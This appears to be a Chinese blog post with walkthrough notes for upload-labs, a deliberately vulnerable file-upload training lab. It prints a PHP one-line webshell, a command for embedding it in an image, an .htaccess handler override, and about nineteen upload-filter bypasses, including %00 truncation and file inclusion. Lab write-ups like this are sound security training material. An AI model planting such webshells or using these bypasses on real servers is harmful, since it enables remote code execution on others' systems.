文件上传之upload_labs通关笔记

本文详细介绍了在渗透测试中绕过各种安全防护措施的方法,包括利用图片木马、文件上传漏洞及多重后缀名等技巧,同时提供了十六进制编辑工具的使用方法,帮助读者深入理解并实践安全测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

项目地址:https://github.com/c0ny1/upload-labs/releases

类型分类

在这里插入图片描述

通关记录

php一句话木马<?php eval($_POST['cmd'])?>
cmd命令行构造一句话图片木马指令

copy xx.jpg/b + xx.php/a new.jpg
xx.jpg 正常图片
xx.php 一句话木马文件,首行要先空格再构写一句话木马

16进制编辑工具:010Editor6.0
1.js前端验证,burp抓包修改后缀绕过
2. MIME验证,同上
在这里插入图片描述
3. php345绕过,抓包修改后缀名为php3
4. 上传.htaccess文件后再上传图片木马
构造:SetHandler application/x-httpd-php
不管什么后缀都会被当做php文件解析
注意:文件名必须为.htaccess文件
在这里插入图片描述
5. 大小写绕过
6. 空格绕过,抓包在后缀名后添加空格
7. 点绕过,在后缀名后面加点
8. ::$DATA绕过,也是加在后缀名后
9. 构造php. .(点+空格+点)进行绕过
10. 双重后缀名绕过,构造pphphp进行绕过
11. get类型%00截断,上传一个木马文件xx.jpg,使用%00截断
在这里插入图片描述
12. post类型%00截断,但需对%00进行解码(decode)
在这里插入图片描述

13–15 上传图片木马,利用文件包含漏洞调用图片进行绕过
利用文件包含漏洞访问上传文件:http://10.10.10.139/include.php?file=http://10.10.10.139/upload/9920200214144230.png
16. 二次渲染过滤,即图片内容部分被打乱重组,可使用十六进制编辑工具编辑图片插入恶意脚本,需插入没被打乱的部分
在这里插入图片描述
17-18.条件竞争绕过,重放发包
19.保存路径POST%00截断

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值